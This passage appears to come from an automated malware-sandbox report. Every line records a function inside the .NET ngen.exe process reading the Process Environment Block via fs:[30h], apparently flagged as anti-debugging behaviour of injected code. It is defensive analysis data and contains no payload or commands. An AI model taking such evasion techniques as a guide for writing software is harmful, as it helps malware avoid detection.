Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA6C7 mov ebx, dword ptr fs:[00000030h] 4_2_058BA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA6C7 mov eax, dword ptr fs:[00000030h] 4_2_058BA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F6C7 mov eax, dword ptr fs:[00000030h] 4_2_0593F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC mov eax, dword ptr fs:[00000030h] 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC mov eax, dword ptr fs:[00000030h] 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC mov eax, dword ptr fs:[00000030h] 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC mov eax, dword ptr fs:[00000030h] 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059006F1 mov eax, dword ptr fs:[00000030h] 4_2_059006F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059006F1 mov eax, dword ptr fs:[00000030h] 4_2_059006F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593D6F0 mov eax, dword ptr fs:[00000030h] 4_2_0593D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B36EF mov eax, dword ptr fs:[00000030h] 4_2_058B36EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD6E0 mov eax, dword ptr fs:[00000030h] 4_2_058AD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD6E0 mov eax, dword ptr fs:[00000030h] 4_2_058AD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_058FE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_058FE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_058FE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_058FE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE609 mov eax, dword ptr fs:[00000030h] 4_2_058FE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BF603 mov eax, dword ptr fs:[00000030h] 4_2_058BF603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B1607 mov eax, dword ptr fs:[00000030h] 4_2_058B1607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2619 mov eax, dword ptr fs:[00000030h] 4_2_058C2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05883616 mov eax, dword ptr fs:[00000030h] 4_2_05883616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05883616 mov eax, dword ptr fs:[00000030h] 4_2_05883616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05955636 mov eax, dword ptr fs:[00000030h] 4_2_05955636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588262C mov eax, dword ptr fs:[00000030h] 4_2_0588262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B6620 mov eax, dword ptr fs:[00000030h] 4_2_058B6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B8620 mov eax, dword ptr fs:[00000030h] 4_2_058B8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E627 mov eax, dword ptr fs:[00000030h] 4_2_0589E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589C640 mov eax, dword ptr fs:[00000030h] 4_2_0589C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA660 mov eax, dword ptr fs:[00000030h] 4_2_058BA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA660 mov eax, dword ptr fs:[00000030h] 4_2_058BA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B9660 mov eax, dword ptr fs:[00000030h] 4_2_058B9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B9660 mov eax, dword ptr fs:[00000030h] 4_2_058B9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594866E mov eax, dword ptr fs:[00000030h] 4_2_0594866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594866E mov eax, dword ptr fs:[00000030h] 4_2_0594866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B2674 mov eax, dword ptr fs:[00000030h] 4_2_058B2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C0185 mov eax, dword ptr fs:[00000030h] 4_2_058C0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590019F mov eax, dword ptr fs:[00000030h] 4_2_0590019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590019F mov eax, dword ptr fs:[00000030h] 4_2_0590019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590019F mov eax, dword ptr fs:[00000030h] 4_2_0590019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590019F mov eax, dword ptr fs:[00000030h] 4_2_0590019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h] 4_2_0587A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h] 4_2_0587A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h] 4_2_0587A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593C188 mov eax, dword ptr fs:[00000030h] 4_2_0593C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593C188 mov eax, dword ptr fs:[00000030h] 4_2_0593C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D7190 mov eax, dword ptr fs:[00000030h] 4_2_058D7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h] 4_2_059311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h] 4_2_059311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h] 4_2_059311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h] 4_2_059311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589B1B0 mov eax, dword ptr fs:[00000030h] 4_2_0589B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059461C3 mov eax, dword ptr fs:[00000030h] 4_2_059461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059461C3 mov eax, dword ptr fs:[00000030h] 4_2_059461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BD1D0 mov eax, dword ptr fs:[00000030h] 4_2_058BD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BD1D0 mov ecx, dword ptr fs:[00000030h] 4_2_058BD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059551CB mov eax, dword ptr fs:[00000030h] 4_2_059551CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058851ED mov eax, dword ptr fs:[00000030h] 4_2_058851ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059561E5 mov eax, dword ptr fs:[00000030h] 4_2_059561E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B01F8 mov eax, dword ptr fs:[00000030h] 4_2_058B01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05940115 mov eax, dword ptr fs:[00000030h] 4_2_05940115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 mov ecx, dword ptr fs:[00000030h] 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h] 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h] 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h] 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B0124 mov eax, dword ptr fs:[00000030h] 4_2_058B0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h] 4_2_0587B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h] 4_2_0587B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h] 4_2_0587B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h] 4_2_0587B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881131 mov eax, dword ptr fs:[00000030h] 4_2_05881131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881131 mov eax, dword ptr fs:[00000030h] 4_2_05881131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05955152 mov eax, dword ptr fs:[00000030h] 4_2_05955152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879148 mov eax, dword ptr fs:[00000030h] 4_2_05879148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879148 mov eax, dword ptr fs:[00000030h] 4_2_05879148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879148 mov eax, dword ptr fs:[00000030h] 4_2_05879148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879148 mov eax, dword ptr fs:[00000030h] 4_2_05879148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587C156 mov eax, dword ptr fs:[00000030h] 4_2_0587C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov eax, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov eax, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov ecx, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov eax, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov eax, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05887152 mov eax, dword ptr fs:[00000030h] 4_2_05887152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05886154 mov eax, dword ptr fs:[00000030h] 4_2_05886154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05886154 mov eax, dword ptr fs:[00000030h] 4_2_05886154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05919179 mov eax, dword ptr fs:[00000030h] 4_2_05919179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588208A mov eax, dword ptr fs:[00000030h] 4_2_0588208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587D08D mov eax, dword ptr fs:[00000030h] 4_2_0587D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B909C mov eax, dword ptr fs:[00000030h] 4_2_058B909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD090 mov eax, dword ptr fs:[00000030h] 4_2_058AD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD090 mov eax, dword ptr fs:[00000030h] 4_2_058AD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05885096 mov eax, dword ptr fs:[00000030h] 4_2_05885096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059460B8 mov eax, dword ptr fs:[00000030h] 4_2_059460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059460B8 mov ecx, dword ptr fs:[00000030h] 4_2_059460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059550D9 mov eax, dword ptr fs:[00000030h] 4_2_059550D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059020DE mov eax, dword ptr fs:[00000030h] 4_2_059020DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD0C0 mov eax, dword ptr fs:[00000030h] 4_2_058FD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD0C0 mov eax, dword ptr fs:[00000030h] 4_2_058FD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A90DB mov eax, dword ptr fs:[00000030h] 4_2_058A90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058880E9 mov eax, dword ptr fs:[00000030h] 4_2_058880E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_0587A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A50E4 mov eax, dword ptr fs:[00000030h] 4_2_058A50E4
